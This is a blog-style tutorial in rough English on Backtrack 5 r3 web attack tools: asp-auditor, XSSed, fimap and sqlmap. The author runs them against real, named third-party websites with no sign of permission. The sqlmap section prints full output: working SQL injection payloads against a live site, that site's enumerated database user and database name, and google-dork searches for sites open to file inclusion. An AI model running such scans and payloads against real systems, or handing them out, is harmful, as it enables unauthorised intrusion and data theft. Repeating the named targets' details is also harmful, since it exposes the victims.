This is a little theory with we can to use perl and python. Let´s go!!
asp-auditor is a perl script created that allows you to find useful information on a web server.
First go to Backtrack 5 r3 dir: /Backtrack/Exploitation Tools/Web Exploitation Tools/asp-auditor.
Appear the following
Usage: ./asp-audit.pl [http://target/app/file.aspx] (opts)
(opts)
-bf brute force ASP.NET version using JS Validate
directories.
Now you see the next:
root@bt:/pentest/web/asp-auditor#
To use the script you need to run the following syntax:
perl asp-auditor.pl website/page.aspx options
After you put the following I used this web http://conalepsin.edu.mx/apps/chekt/Default.aspx
root@bt:/pentest/web/asp-auditor# perl asp-audit.pl http://conalepsin.edu.mx/apps/chekt/Default.aspx -bf
Sending initial probe request...
Sending path discovery request...
Sending ASP.NET validate discovery request...
Sending ASP.NET Apr/07 XSS Check
Sending application trace request...
Sending null remoter service request...
[ .NET Configuration Analysis ]
Server -> Microsoft-IIS/6.0
ADNVersion -> 2.0.50727
matches -> 2.0.50727.07 Version 2.0 (Visual Studio.NET 2005 CTP) Aug 2005
matches -> 2.0.50727.26 Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP) Sep 2005
matches -> 2.0.50727.42 Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM) Nov 2005
Sending brute force discovery requests...
Knowing websites vulnerable to Cross Site Scripting using Backtrack 5 r3. A little theory, a cross site scripting is a typical type of security hole Web application that allows third party websites inject the user views JavaScript code or in another script language similar.
To begin, start Backtrack 5 r3, once started is entered
Applications / Backtrack / Information Gathering / Web Application Analysis / Open Source Analysis / XSSed
The link is directed to http://www.xssed.com/archive website, which displays a list of websites vulnerable to Cross Site Scripting
To prevent such attacks, it is necessary for the proper configuration files of type javascript, php, vbscript, output filter content, in short, all entries entered by users must be verified before being used.
Here I leave this brief manual Fimap tool use in Backtrack 5 r3. A little theory, Fimap is a tool created in the python programming language, which allows you to explore and exploit such vulnerabilities RFI (reomte File Inclusion) or LIF (Local File Inclusion). It also allows, if you have an Internet connection, via google searchpaths vulnerability to Web sites.
To start, starts Backtrack 5 r3. Once initiated Entering directory / pentest / web / fimap;
cd / pentest / web / fimap
root@bt:~# cd /pentest/web/fimap
root@bt:/pentest/web/fimap# ./fimap.py -u 'http://www.website/news.php?id=108'
You can to look for with google dorks too
root@bt:/pentest/web/fimap# ./fimap.py -u 'index.php?id='
When the website is vulnerable to Remote File Inclusion is displayed on the terminal notifying exploitation. Fimap is a very good tool for administrators and whose main objective is to improve the quality and security of your website.
[B]SQLMAP
Sqlmap in Backtrack 5 r3. A little theory, sqlmap is a tool to detect and exploit SQL injection vulnerabilities thus obtaining full access to the database server Algin web, regardless of the type of operating system.
To use the tool, start Backtrack 5 r3 and Entering directory
/ pentest / database / sqlmap
root@bt:# cd /pentest/database/sqlmap/
Appear the following:
root@bt:/pentest/database/sqlmap#
Next steep:
root@bt:/pentest/database/sqlmap# ls
doc lib plugins README.md sqlmap.conf sqlmap.py tamper udf
extra output procs shell _sqlmap.py _sqlmap.pyc txt xml
After we write ./sqlmap.py -u http://www.weburl.com. I used a url http://www.centro-lomas.com.ar
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.centro-lomas.com.ar/detalles.php?id=1
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:08:56
[18:08:57] [INFO] testing connection to the target url
[18:08:59] [INFO] testing if the url is stable, wait a few seconds
[18:09:00] [INFO] url is stable
[18:09:00] [INFO] testing if GET parameter 'id' is dynamic
[18:09:01] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:01] [INFO] GET parameter 'id' is dynamic
[18:09:02] [INFO] heuristics detected web page charset 'ascii'
[18:09:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:09:02] [INFO] testing for SQL injection on GET parameter 'id'
[18:09:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:03] [WARNING] reflective value(s) found and filtering out
[18:09:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:09:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:09:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[18:09:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:09:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[18:09:16] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:09:18] [INFO] target url appears to have 6 columns in query
[18:09:19] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a717 4773a), NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[18:09:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
[18:09:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.centro-lomas.com.ar'
shutting down at 18:09:28
Also if you want to use the helper to run the tool incorporates the following syntax:
./sqlmap.py --wizard
root@bt:/pentest/database/sqlmap# ./sqlmap.py --wizard
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:10:02
Please enter full target URL (-u): http://www.centro-lomas.com.ar/detalles.php?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a717 4773a), NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
banner: '5.1.66-cll'
current user: 'cenlom09_gestor@localhost'
current database: 'cenlom09_capacitacion'
current user is DBA: None
shutting down at 18:10:53
The assistant will guide you through the setup of the website you want to test the vulnerability.
No comments:
Post a Comment